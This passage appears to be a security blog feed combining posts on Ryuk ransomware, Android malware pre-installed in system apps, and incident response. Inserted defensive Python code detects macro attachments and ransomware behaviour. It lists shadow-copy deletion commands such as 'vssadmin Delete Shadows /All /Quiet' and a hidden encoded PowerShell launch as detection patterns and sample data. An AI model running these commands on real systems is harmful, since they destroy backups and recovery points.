One such attack was on the Onslow Water and Sewer Authority (OWASA) on October 15, 2018, which kept the organization from being able to use their computers for a time. While water and sewage services, as well as customer data, were untouched by the ransomware attack, it still caused significant damage to the organization’s network and resulted in numerous databases and systems being rebuilt from the ground up.

Infection method

According to Checkpoint and multiple other analysts and researchers, Ryuk is spread as a secondary payload through botnets, such as TrickBot and Emotet.

Here is the running theory: Emotet makes the initial infection on the endpoint. It has its own abilities to spread laterally throughout the network, as well as launch its own malspam campaign from the infected endpoint, sending additional malware to other users on the same or different networks.

From there, the most common payload that we have seen Emotet drop over the last six months has been TrickBot. This malware has the capability to steal credentials, and also to move around the network laterally and spread in other ways.

Both TrickBot and Emotet have been used as information stealers, downloaders, and even worms based on their most recent functionality.

At some point, for reasons we will explore later in this post, TrickBot will download and drop Ryuk ransomware on the system, assuming that the infected network is something that the attackers want to ransom. Since we don’t see even a fraction of the number of Ryuk detections as we see of Emotet and TrickBot through our product telemetry, we can assume that it’s not the default standard operation to infect systems with Ryuk after a time, but rather something that is triggered by a human attacker behind the scenes.

Stats

Let’s take a look at the stats for Emotet, Ryuk, and TrickBot from August until present-day and see if we can’t identify a trend.

Malwarebytes’ detections from August 1, 2018 – January 2, 2019

The blue line represents Emotet, 2018’s biggest information-stealing Trojan. While this chart only shows us August onward, rest assured that for much of the year, Emotet was on the map. However, as we sailed into Q4 2018, it became a much bigger problem.

The orange line represents TrickBot. These detections are expected to be lower than Emotet, since Emotet is usually the primary payload. This means that in order for TrickBot to be detected, it must have either been delivered directly to an endpoint or dropped by an Emotet infection that was undetected by security software or deployed on a system without it. In addition, TrickBot hasn’t been the default payload for Emotet for the entire year, as the Trojan has continuously swapped payloads, depending on time of year and opportunity.

Based on this, to get hit with Ryuk (at least until we figure out the real intention here) you would need to have either disabled, not installed, or not updated your security software. You would need to refrain from conducting regular scans to identify TrickBot or Emotet. You would need to either have unpatched endpoints or weak credentials for TrickBot and Emotet to move laterally throughout the network and then, finally, you would need to be a target.

That being said, while our detections of Ryuk are small compared to the other families on this chart, that’s likely because we caught the infection during an earlier stage of the attack, and the circumstances for a Ryuk attack need to be just right—like Goldilocks’ porridge. Surprisingly enough, organizations have created the perfect environment for these threats to thrive. This may also be the reason behind the huge ransom payment, as fewer infections lead to fewer payouts.

Christmas campaign

While active earlier in the year, Ryuk didn’t make as many headlines as when it launched its “holiday campaign,” or rather the two largest sets of Ryuk infections, which happened around Christmastime.

The chart below shows our detection stats for Ryuk from the beginning of December until now, with the two infection spikes noted with stars.

Malwarebytes’ Ryuk detections December 5, 2018 – January 2, 2019

These spikes show that significant attacks occurred on December 24 and December 27.

Data Resolution attack

The first attack was on Dataresolution.net, a cloud hosting provider, on Christmas Eve. As you can see from above, it was the most Ryuk we had detected in a single day over the last month.

According to Data Resolution, Ryuk was able to infect systems by using a compromised login account. From there, the malware gave control of the organization’s data center domain to the attackers until the whole network was shut down by Data Resolution.

The company assures customers that no user data was compromised, and that the intent of the attack was to hijack, not steal. Knowing how this malware finds its way onto an endpoint in the first place (via credential-stealing Trojans), however, it is likely that they have lost at least some information.

Tribune Publishing attack

Our second star represents the December 27 attack, when multiple newspaper organizations under the Tribune Publishing umbrella (currently or in the recent past) were hit with Ryuk ransomware, essentially disabling these organizations’ ability to print their own papers.

The attack was discovered late Thursday night, when one of the editors at the San Diego Union-Tribune was unable to send finished pages to the printing press. These issues have since been resolved.

Theories

We believe Ryuk is infecting systems using Emotet and TrickBot to distribute the ransomware. However, what’s unclear is why criminals would use this ransomware after an already-successful infection.

In this case, we can actually take a page from the Hermes playbook. We witnessed Hermes being used in Taiwan as a means to cover the tracks of another malware family already on the network. Is Ryuk being used in the same way?

Since Emotet and TrickBot are not state-sponsored malware, and they are usually automatically launched to a blanket of would-be victims (rather than identifying a target and being launched manually), it seems odd that Ryuk would be used in only a few cases to hide the infection. So perhaps we can rule this theory out.

A second, more probable theory is that the purpose of Ryuk is as a last ditch effort to extort more value from an already-juicy target.

Let’s say that the attackers behind Emotet and TrickBot have their bots map out networks to identify a target organization. If the target has a large enough infection spread of Emotet/TrickBot, and/or if its operations are critical or valuable enough that disruption would trigger an inclination to pay the ransom, then that might make it the perfect target for a Ryuk infection.

The true intention for using this malware can only be speculated at this point. However, whether it’s hiding the tracks of other malware or simply looking for ways to make more cash after stealing all the relevant data they could, businesses should be wary of writing this one off.

The fact remains that there are thousands of active Emotet and TrickBot infections all over the world right now. Any of the organizations that are dealing with these threats need to take them seriously, because an information stealer might turn into nasty ransomware at any time. This is the truth of our modern threat landscape.

Attribution

As mentioned earlier, many analysts and journalists have decided that North Korea is the most likely attacker to be distributing Ryuk. While we can’t completely rule this out, we aren’t entirely sure it’s accurate.

Ryuk does match Hermes in many ways. Based on the strings found, it was likely built on top of, or is a modified version of Hermes. How the attackers got the source code is unknown, however, we have observed instances where criminals were selling versions of Hermes on hacker forums.

This introduces another potential reason the source code got into the hands of a different actor.

Attributing this attack based on similarities between two families, one of which is associated with a known nation-state attack group (Lazarus), is a logical fallacy, as described by Robert M. Lee in a recent article, “Attribution is not Transitive – Tribune Publishing Cyber Attack as a Case Study.” The article takes a deeper dive into the errors of attribution based on flimsy evidence. We caution readers, journalists, and other analysts against drawing conclusions from correlations.

Protection

Now that we know how and potentially why Ryuk attacks businesses, how can we protect against this malware and others like it?

Let’s focus on specific technologies and operations that are proven effective against this threat.

Anti-exploit technology

The use of exploits for both infection and lateral movement has been increasing for years. The primary method of infection for Emotet at the moment is through spam with attached Office documents loaded with malicious scripts.
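As an added example (not code from this article or from Malwarebytes), here is a small Python triage routine that flags macro-bearing Office attachments before a user ever sees the “Enable content” prompt. Modern Office files are zip containers, and a VBA project shows up as a vbaProject.bin entry, so the check needs only the standard library and does not trust the file extension. The sample documents are constructed in memory; legacy OLE2 .doc files (a format Emotet lures frequently used) need a dedicated parser such as oletools and are only flagged here for deeper inspection.

```python
"""Flag e-mail attachments that carry Office macros.

Added example (not Malwarebytes code). OOXML files (.docx/.docm/.xlsm ...) are zip
archives; a VBA project is stored as a vbaProject.bin entry. Legacy OLE2 files
(.doc/.xls) are flagged for deeper inspection because macro detection there needs
an OLE parser such as oletools, which is deliberately not assumed here.
"""
import io
import zipfile
from typing import List, Tuple

ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
VBA_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
MACRO_EXTENSIONS = (".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm")


def has_vba_project(data: bytes) -> bool:
    """True if an OOXML container embeds a VBA project, whatever its extension says."""
    if not data.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return False
    return any(part in names for part in VBA_PARTS)


def classify(filename: str, data: bytes) -> str:
    """'macro', 'ole-legacy' (needs oletools), or 'no-vba'."""
    if data.startswith(OLE_MAGIC):
        return "ole-legacy"
    # Check both the extension and the content, so the verdict never rests on the filename alone.
    if filename.lower().endswith(MACRO_EXTENSIONS) or has_vba_project(data):
        return "macro"
    return "no-vba"


def triage(attachments: List[Tuple[str, bytes]]) -> List[str]:
    """Names of attachments that should be held for review instead of delivered."""
    return [name for name, data in attachments if classify(name, data) != "no-vba"]


def build_sample_docx(with_macro: bool) -> bytes:
    """Constructed minimal OOXML document for testing; not a real lure."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 8)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample attachments.
    samples = [
        ("invoice.docx", build_sample_docx(True)),   # .docx extension, but a VBA project inside
        ("agenda.docx", build_sample_docx(False)),
        ("report.xlsm", b""),
        ("old.doc", OLE_MAGIC + b"\x00" * 504),
    ]
    for name in triage(samples):
        print("hold:", name, classify(name, dict(samples)[name]))
```

Held attachments go to a sandbox or an analyst, not straight to the user. A policy that blocks every macro-enabled file outright is simpler still, and for most organisations it is the right default; the classifier above is for the mailbox that genuinely needs some macros to get through.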

These malicious scripts are macros that, once the user clicks “Enable content” (usually after some kind of social engineering trick), launch additional scripts to cause havoc. We most commonly see these follow-on scripts written in JavaScript and PowerShell, with PowerShell quickly becoming the de facto scripting language for infecting users.

While you can stop these threats by training users to recognize social engineering attempts or use an email protection platform that recognizes malicious spam, using anti-exploit technology can also block those malicious scripts from trying to install malware on the system.
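To make the chain concrete, here is an added example (not Malwarebytes’ product logic) of the detection a SOC would write for two of the behaviours described in this post: an Office application spawning a script host, which is what the macro-to-PowerShell step above looks like in process-creation telemetry, and the shadow-copy deletion noted under “What is Ryuk?”. The events are constructed in the shape of Sysmon Event ID 1 / Windows 4688 fields, and the vssadmin/wmic/wbadmin/bcdedit command patterns are the ones Ryuk and other ransomware are publicly documented to run, not something quoted from this article.

```python
"""Hunt process-creation telemetry for the Emotet-to-Ryuk chain.

Added example; not Malwarebytes code. Events mimic Sysmon Event ID 1 / Windows 4688
fields. Shadow-copy command patterns follow public Ryuk analyses, not this article.
"""
import re
from typing import Dict, List, Optional, Tuple

# Stage 1: the macro launching a script host (maldoc -> PowerShell/JScript/cmd).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Stage 2: destroying local recovery points before encryption. Only the destructive
# verbs are matched; `vssadmin list/create` is routine for backup agents.
SHADOW_DESTRUCTION = [
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I),
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bresize\s+shadowstorage\b", re.I),
    re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\s+delete\b", re.I),
    re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+catalog\b", re.I),
    re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I),
]


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Label one event, or None when it matches neither stage."""
    if _basename(event["parent"]) in OFFICE_APPS and _basename(event["image"]) in SCRIPT_HOSTS:
        return "maldoc-spawned-script-host"
    if any(p.search(event["cmd"]) for p in SHADOW_DESTRUCTION):
        return "shadow-copy-destruction"
    return None


def hunt(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(host, label, command line) for every suspicious event, in input order."""
    out = []
    for ev in events:
        label = classify(ev)
        if label:
            out.append((ev["host"], label, ev["cmd"]))
    return out


# Constructed sample telemetry; hosts, users and paths are invented.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": r"CORP\jdoe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -enc <base64 payload>"},
    {"host": "ws01", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "srv02", "user": r"NT AUTHORITY\SYSTEM",
     "parent": r"C:\Program Files\BackupAgent\agent.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe list shadows"},  # benign: read-only VSS query
    {"host": "ws05", "user": r"CORP\mwu",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'"WINWORD.EXE" /n "C:\Users\mwu\Downloads\invoice.doc"'},  # benign: user opened a file
    {"host": "ws01", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": "wmic.exe shadowcopy delete"},
]

if __name__ == "__main__":
    for host, label, cmd in hunt(SAMPLE_EVENTS):
        print(f"{host}  {label:28}  {cmd}")
```

Two practical caveats: Windows event 4688 only carries the command line when “Include command line in process creation events” is enabled (Sysmon records it by default), and a stage-2 hit on a workstation should be treated as “encryption is minutes away”, which is why the two stages are worth correlating by host rather than alerting on in isolation.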

In addition, protection technologies such as anti-ransomware add immense amounts of protection against ransomware infections, stopping them before they can do serious damage.

Regular, updated malware scans

This is a general rule that has been ignored enough times to be worth mentioning here. In order to have effective security solutions, they need to be used and updated frequently so they can recognize and block the latest threats.

In one case, the IT team of an organization didn’t even know they were lousy with Emotet infections until they had updated their security software. They had false confidence in a security solution that wasn’t fully armed with the tools to stop the threats. And because of that, they had a serious problem on their hands.


Network segmentation

This is a tactic that we have been recommending for years, especially when it comes to protecting against ransomware. To ensure that you don’t lose your mapped or networked drives and resources if a single endpoint gets infected, it’s a good idea to segment access to certain servers and files.

There are two ways to segment your network and reduce the damage from a ransomware attack. First, restrict access to certain mapped drives based on role requirements. Second, use a separate or third-party system for storing shared files and folders, such as Box or Dropbox.

Evolving threats

This last year has brought with it some novel approaches to causing disruption and devastation in the workplace. While ransomware was the deadliest malware for businesses in 2017, 2018 and beyond look to bring us multiple malware deployed in a single attack chain.

What’s more, families like Emotet and TrickBot continue to evolve their tactics, techniques, and capabilities, making them more dangerous with each new generation. While today, we might be worried about Emotet dropping Ryuk, tomorrow Emotet could simply act as ransomware itself. It’s up to businesses and security professionals to stay on top of emerging threats, however minor they may appear, as they often signal a change in the shape of things to come.

Thanks for reading and safe surfing!

The post Ryuk ransomware attacks businesses over the holidays appeared first on Malwarebytes Labs.

Server Security for the Modern IT Ecosystem

A Changing Landscape

In recent years we’ve seen a fundamental shift in the IT landscape, accelerated towards cloud and containerized infrastructures. According to Forbes, by 2020 it is predicted that 83 percent of enterprise workloads will be in the cloud. Moving beyond the cloud, software development teams are driving further change with the adoption of microservice architectures and containers, a market poised to grow over 40 percent year over year. The adoption of these new technologies signals a major change in IT infrastructures for modern enterprises. However, this transition is not always seamless, and it can be difficult to refactor legacy applications for a new technology stack. As a result, teams are building and deploying applications across a variety of environments, including physical machines, virtual machines, containers, and cloud infrastructures. While these new technologies offer great benefits in terms of agility, scalability, and continuous integration (CI)/continuous delivery (CD), they also add a layer of complexity to security that can expose the organization to vulnerabilities and threats. Overall, the combination of new application technology with existing legacy architectures and deployment models leads to greater IT complexity, making it extremely difficult to achieve consistent security across the organization.

A Growing Threat to Servers

Enterprise security has traditionally been thought of as primarily an endpoint issue; however, the modernization of the IT landscape is resulting in attacks from all directions. Servers have become an important target for cybercrime, with more than 145 million U.S. citizens having their data compromised by the Equifax server breach. In recent years, we’ve seen a number of high-profile server-targeted vulnerabilities. For example, the Equifax attack leveraged a server-side vulnerability in the Apache Struts web application framework, and Heartbleed, a bug in OpenSSL’s TLS heartbeat extension, let attackers read private data straight out of server memory.

Servers are the workhorses of the IT environment, and server workloads have fundamentally different security requirements from traditional endpoint protection. As threats increase in sophistication, there is no single miracle fix to server protection. Rather, it requires multiple techniques through a layered security approach. Security and risk managers should utilize offerings dedicated to cloud workload protection, or cloud workload protection platforms (CWPP). As stated in Gartner’s 2018 Market Guide, “The market for cloud workload protection platforms (CWPPs) is defined by offerings specifically designed for server workload-centric security protection and are typically agent-based for deep workload visibility and attack prevention capabilities.”* 

Market-Leading Performance

Additionally, Trend Micro believes that the Deep Security™ platform meets many capabilities and architectural considerations listed in Gartner’s Market Guide for Cloud Workload Protection Platforms.

Deep Security offers recommendations through the following:

  • Seamless integration with leading environments, including AWS, Azure®, and VMware®
  • Complete visibility and protection of workloads
  • Automatic discovery and deployment of security controls
  • Security integrated with your DevOps team’s toolsets
  • Support for microservices architectures and Docker® container protection

This is all done with minimal impact on performance, allowing companies to maintain their agility without sacrificing security. Learn more about our Hybrid Cloud Security solutions, and contact us to discover what makes Trend Micro the number one provider of corporate server security.

Sources:
*Gartner, “Market Guide for Cloud Workload Protection Platforms”, Neil MacDonald, 26 March 2018 G00328483. 
451 Research’s Market Monitor: Cloud Enabling Technologies, Q3 2016
Trend Micro, “Critical Remote Code Execution Vulnerability (CVE-2018-11776) Found in Apache Struts”
https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/critical-remote-code-execution-vulnerability-cve-2018-11776-found-in-apache-struts


The new landscape of pre-installed mobile malware: malicious code within

Here’s a scary thought: Mobile devices may soon come with pre-installed malware on required system apps. While it might sound like a grim foretelling, pre-installed mobile malware is an unfortunate reality of the future.

In the past, we’ve seen pre-installed malware with the notorious Adups threat, among others. “Pre-installed” means the malware comes already installed on a device at the system level, thus, it cannot be removed; only disabled. However, remediating these iterations of pre-installed malware is possible by using a work-around to uninstall apps for the current user. This method involves connecting the mobile device to a PC and using the ADB command line tool. Follow our guide, removal instructions for Adups, to find out more.

Although this method is a bit tedious, it works to remediate the malware. In contrast, remediating newer versions of pre-installed malware has become much more difficult. We are now seeing malware authors target system apps that are required for the device to function properly. By injecting malicious code within these necessary apps, threat actors have reshaped the landscape of pre-installed malware for the worse.

Types of pre-installed apps

There are two types of preinstalled apps, based on the apps’ location on the device. This location also determines the importance of the app.

The first location is /system/app/. Apps in this location are typically something you want to have, but not critical for the device to run. For example, apps that contain functionality for the camera, Bluetooth, FM radio, or photo viewing are stored in this location. This location is also where device manufacturers place what some may consider bloatware. Uninstalling some of these apps may degrade the user experience, but it isn’t going to stop the device from functioning.

The other location is /system/priv-app/. This is where significantly important apps reside. For instance, apps like Settings and System UI, which include the functionality for the back/home buttons on Android devices, are stored here. In other words, these are apps you absolutely cannot uninstall without essentially breaking the phone. Sadly, the latest pre-installed malware is targeting this location.

The evidence

In the light of this new, frightening pre-installed malware, let’s look at two case studies.

Case study 1: Riskware auto installer within System UI

The device is a THL T9 Pro. The infection is Android/PUP.Riskware.Autoins.Fota.INS. Although the code looks similar to the well-known preinstalled malware Adups, it’s entangled within the critical system app System UI, instead of being in a standalone app like UpgradeSys. The infection causes headaches, as it repeatedly installs variants of Android/Trojan.HiddenAds. It’s unknown whether this is the doing of Adups themselves, or whether code was taken from the Adups Auto Installer and inserted into System UI. Neither scenario is good.

Case Study 2: Monitor within settings

This time, the device is a UTOK Q55. The infection is Android/Monitor.Pipe.Settings. The category “Monitor” is a subset of Potentially Unwanted Programs (PUPs). As the name implies, Monitor apps collect and report sensitive information from the device. Furthermore, this particular Monitor app is hardcoded in the highly-important Settings app. In effect, the app used to uninstall other apps would need to be uninstalled itself to remediate—pure irony.

Attempting to remediate

Here lies the biggest problem with these infections: there is currently no good way to remediate. I have worked with several customers with these infections, but despite my attempts, I have yet to find a good workaround. However, I can offer some guidance. If a clean version of the system app can be found to replace the malicious version, you might be able to replace it. You will want to look for system apps that match the current Android OS version of the device. If found, you can try using the following method:

  • Read the disclaimer from the removal instructions for Adups.
  • Follow the steps under Restoring apps onto the device (without factory reset) in the removal instructions for Adups to save the proper <full path of the apk> of the system app to be replaced.
  • Download a clean version of the system app to your PC.
    • You can use the popular site VirusTotal to determine if it’s clean or not.
  • Move the system app from your PC to your device.
    • adb push <PC file path>\<filename of clean version.apk> /sdcard/Download/<filename of clean version.apk>
  • Uninstall the old, malicious version of the system app.
    • adb shell pm uninstall -k --user 0 <package name of malicious system app>
  • Install the new version of the system app.
    • adb shell pm install -r --user 0 /sdcard/Download/<filename of clean version.apk>
  • See if it works.
    • Common failure errors:
      • [INSTALL_FAILED_VERSION_DOWNGRADE]
      • [INSTALL_FAILED_UPDATE_INCOMPATIBLE]
      • [INSTALL_FAILED_OLDER_SDK]
    • If the new version fails to install, you can revert to the old system app.
      • adb shell pm install -r --user 0 <full path of the apk saved from second step>
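The steps above, wrapped into a small helper as an added example (not the tooling from the Adups guide). It assumes adb is on PATH and exactly one device is attached, reads the APK location from `adb shell pm path <package>` (whose output looks like `package:/system/priv-app/Settings/Settings.apk`), and in its default dry-run mode only returns the commands it would run, so the replace and revert sequences can be inspected before touching the device. It also maps the three install failures listed above to the cause each one usually indicates.

```python
"""Replace-and-revert helper for a trojanized system app, via adb.

Added example, not the Adups guide's tooling. Assumes `adb` is on PATH and exactly one
device is attached. Everything defaults to dry_run=True so the command sequence can be
reviewed (or unit-tested) without a device.
"""
import re
import subprocess
from typing import List, Optional

PRIV_APP_DIR = "/system/priv-app/"
SYSTEM_APP_DIR = "/system/app/"
STAGING_DIR = "/sdcard/Download"

# `pm install` failure codes from the post, with the cause each one usually indicates.
INSTALL_FAILURES = {
    "INSTALL_FAILED_VERSION_DOWNGRADE": "clean APK has a lower versionCode than the installed app",
    "INSTALL_FAILED_UPDATE_INCOMPATIBLE": "clean APK is signed with a different key than the installed app",
    "INSTALL_FAILED_OLDER_SDK": "clean APK requires a newer Android release than the device runs",
}


def parse_pm_path(output: str) -> Optional[str]:
    """APK path from `adb shell pm path <pkg>` output ('package:/system/priv-app/...')."""
    m = re.search(r"^package:(\S+)", output, re.M)
    return m.group(1) if m else None


def app_tier(apk_path: str) -> str:
    """'priv-app' (device breaks without it), 'app' (bloatware tier) or 'data' (ordinary user app)."""
    if apk_path.startswith(PRIV_APP_DIR):
        return "priv-app"
    if apk_path.startswith(SYSTEM_APP_DIR):
        return "app"
    return "data"


def replacement_plan(package: str, clean_apk_on_pc: str) -> List[List[str]]:
    """The push / uninstall-for-user-0 / install sequence from the steps above, as argv lists."""
    name = clean_apk_on_pc.replace("\\", "/").rsplit("/", 1)[-1]
    remote = f"{STAGING_DIR}/{name}"
    return [
        ["adb", "push", clean_apk_on_pc, remote],
        ["adb", "shell", "pm", "uninstall", "-k", "--user", "0", package],
        ["adb", "shell", "pm", "install", "-r", "--user", "0", remote],
    ]


def revert_plan(saved_original_apk: str) -> List[List[str]]:
    """Reinstall the original (malicious) APK path saved earlier, so the device at least boots."""
    return [["adb", "shell", "pm", "install", "-r", "--user", "0", saved_original_apk]]


def classify_install_result(output: str) -> str:
    """'ok', or the failure code plus its usual cause."""
    if "Success" in output:
        return "ok"
    for code, cause in INSTALL_FAILURES.items():
        if code in output:
            return f"{code}: {cause}"
    return "unknown failure: " + output.strip()


def run(plan: List[List[str]], dry_run: bool = True) -> List[str]:
    """Return the command strings (dry run) or each command's combined output (live)."""
    results = []
    for argv in plan:
        if dry_run:
            results.append(" ".join(argv))
        else:
            proc = subprocess.run(argv, capture_output=True, text=True)
            results.append(proc.stdout + proc.stderr)
    return results


if __name__ == "__main__":
    # Dry-run walkthrough for the Settings case. A live run would first capture the real
    # `adb shell pm path com.android.settings` output and keep that path for revert_plan().
    original = parse_pm_path("package:/system/priv-app/Settings/Settings.apk\n")
    print("tier:", app_tier(original))
    for line in run(replacement_plan("com.android.settings", r"C:\clean\Settings.apk")):
        print(line)
    print(classify_install_result("Failure [INSTALL_FAILED_VERSION_DOWNGRADE]"))
    for line in run(revert_plan(original)):
        print(line)
```

The install step should be checked with classify_install_result() before declaring victory, and the revert plan kept ready: a priv-app package left uninstalled for user 0 is exactly the “broken phone” the section above warns about.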

As noted above, I have yet to find a version of any of the infections encountered that successfully installs. If you need assistance, feel free to post on our forum Mobile Malware Removal Help & Support.

What really can be done?

Currently, the best method to deal with these infections is to:

  1. Stay away from devices with these infections. Here are the manufacturers/models we have seen so far that have been impacted:
    • THL T9 Pro
    • UTOK Q55
    • BLU Studio G2 HD
  2. If you already bought one, return the device.
  3. If you already bought the device and can’t return it, contact the manufacturer.

Extreme frustration

As a mobile malware researcher, it pains me to no end to write about malware we can’t currently remediate.  However, the public needs to know that these types of infections exist in the wild. No one should have to tolerate such infections on any mobile device regardless of its price point and/or notoriety. I will continue to look for methods to deal with these infections. In the meantime, stay safe out there.

APK samples

Detection: Android/PUP.Riskware.Autoins.Fota.INS
MD5: 9E0BBF6D26B843FB8FE95FDAD582BB70
Package Name: com.android.systemui

Detection: Android/Monitor.Pipe.Settings
MD5: DC267F396FA6F06FC7F70CFE845B39D7
Package Name: com.android.settings

The post The new landscape of pre-installed mobile malware: malicious code within appeared first on Malwarebytes Labs.

Incident Response In The Public Eye

Cyberattacks happen constantly. Every day, organizations are attacked online whether they realize it or not. Most of these attacks are passing affairs. The mere fact that systems are connected to the internet makes them a target of opportunity. For the most part, these attacks are non-events.

Security software, bugs in attack code, and updated applications stop most attacks. With 20 billion+ devices connected to the internet, it’s easy enough for the attack to move on.

But every couple of weeks there is a big enough attack to draw headlines. You’ve seen a steady stream of them over the past few years. 10 million records here, thousands of systems there, and so on.

When we talk about these attacks, for most people, it’s an abstract discussion. It’s hard to visualize an abstract set of data that lives online somewhere.

The recent attack on the Tribune Publishing network is different. This attack had a real world impact. Around the United States, newspapers arrived late and missing significant sections of content.

Timeline

Late Thursday, some systems on the Tribune Publishing network were inaccessible. This is not an uncommon experience for anyone working in a large organization.

Technology has brought about many wonders but reliability isn’t typically one of them. When a system is inaccessible, it’s not out of the question to first think, “Ugh, this isn’t working. Call IT.”

Support tickets are often the first place cyberattacks show up…in retrospect. All public signs in the Tribune Publishing attack point this way. Once support realized the extent of the issue and that it involved malware, the event—a support request—turned into an incident. This kicks off an incident response (IR) process.

It’s this process that the teams at Tribune Publishing are dealing with now.

Whodunnit?

“Who is behind the attack?” is the first question on everyone’s mind. It’s human nature, doubly so at a media organization, to want to understand the “who” and “why” as opposed to the “how”.

The reality is that for the incident response process, that’s a question that wastes time. The goal of the incident response process is to limit damage to the organization and to restore systems as fast as possible.

In that context, the response team only needs to roughly classify their attacker. Is the attacker:

  1. A low level cybercriminal who got lucky with an automated attack and has few resources to continue or sustain the attack?
  2. A cybercriminal intending on attacking a specific class of organization or systems?
  3. A cybercriminal targeting your organization?

Knowing which class of cybercriminal is behind the attack will help dictate the effort required in your response.

For a simple attack, your automated defences should take care of it. Even after an initial infection, a defence-in-depth strategy will isolate the attack and make recovery straightforward.

If the attack is part of a larger campaign (e.g., WannaCry, NotPetya, etc.), incident response is more complex, but the same principles hold true. The third class of attacker, one specifically targeting your organization, is what causes a change in the process. Now you are defending against an adversary who is actively changing their approach. That requires a completely different mindset compared to other responses.

The Process

Incident response processes generally follow six stages:

  1. Prepare
  2. Identify
  3. Contain
  4. Eradicate
  5. Recover
  6. Learn

On paper the process looks simple. Preparation begins with teams gathering contact information, tools, and by writing out—or better yet, automating—procedures.

Once an incident has started, teams work to identify affected systems and the type of attack. They then contain the attack to prevent it from spreading. Then work to eradicate any trace of the attack.

Once the attack is over, the work shifts to recovering systems and data to restore functionality. Afterwards, an orderly review is conducted and lessons are shared about what worked and what didn’t.

Easy, right?

Any incident responders reading this post can take a minute here, having enjoyed a good laugh. The next section slams everyone back to the harsh reality of IR.

Reality

The six phases of incident response look great on paper but when you’re faced with implementing them in the real world, things never work out so cleanly.

The majority of a response is spent stuck in a near-endless loop: identifying new areas of compromise in order to contain the attack, which hopefully allows responders to eradicate any foothold and recover the affected systems.

This is what most organizations struggle with. The time spent preparing is often insufficient because it’s all theoretical. Combined with the rapid pace of change on the network, this means that teams struggle to keep up during an active incident.

With an organization like Tribune Publishing, things are even more difficult. By its very nature, it’s a 24/7 business with a wide variety of users around the country. This means there are a lot of systems to consider, and each hour of downtime has a very real and significant impact on the bottom line.

As the incident progresses, the response team will make critical decision after critical decision. Shutting down various internal services to protect them. Changing network structures to isolate malicious activity. And a host of other challenges will pop up during the incident.

It’s difficult, hard driving work. Made doubly so with the eyes of senior management, customers, and the general public looking on.

Focus

As a CISO or incident response team leader, you need to focus on the IR process, not on attribution. That’s why it’s worrisome to see early attribution during an incident.

In the Tribune Publishing attack, it was publicly reported that the attack came from outside of the United States. This led to speculation around motivation. It’s likely that statement was based on the malware reportedly found and simple IP address information.

Early in the IR process, evidence like this will be found. It’s easily accessible but also highly unreliable. Malware is often sold in the digital underground and IP addresses are easily spoofed or proxied. The response team knows this but pressure from higher up may demand some form of answer…whether or not it helps resolve the situation.

The team must stay focused on resolving the incident, not spending valuable time and energy getting sidetracked. Attribution has its place. It’s definitely not in the middle of the response to an incident.

Practice

The one hard truth of incident response is that nothing can substitute for experience. Given the—hopefully obvious—fact that you don’t actually want to be attacked, this leads to the concept of a game day or an active simulation.

Popular in cloud environments—AWS runs game days at their events—these exercises provide hands-on experience. Usually held for the operations team, they are of critical importance to the security team as well.

Security doesn’t operate in a vacuum, especially during an incident. Working with other teams during an incident is key, so practicing that way is a must. This type of work is a huge effort, but one that will pay off significantly when an organization is attacked.

Next Steps

Tribune Publishing was hit by a cyberattack with real world impact. This level of visibility is a stark reminder of how challenging these situations can be. The most critical phase of incident response is the first one: preparation.

As a CISO or senior security team member, you need to prepare more than just the incident response plan. With a plan in hand, you need to get other teams on board and make it clear to senior management how this process works. Critical to success is making sure that management knows that the priority is recovery…not attribution.

Combine that with a lot of practice and when the next incident hits, you’ll have put your team in a reasonable position to respond and recover quickly.

The post Incident Response In The Public Eye appeared first on .

Dancho Danchev’s Threat Data – How to Request Free Access Including a Christmas Discount

Dear blog readers, I wanted to let everyone know that I'm currently offering unlimited and exclusive access to Threat Data - The World's Most Comprehensive Threats Database in the true spirit of the Christmas season to a selected set of individuals and organizations that approach me at dancho.danchev@hush.com Key Summary Points: - the platform basically represents the majority of proprietary

126 Arrests: The Emergence of India’s Cyber Crime Detectives Fighting Call Center Scams

The Times of India reports that police have raided a call center in Noida Sector 63 where hundreds of fraud calls were placed every day to Americans and Canadians resulting in the theft of $50,000 per day.

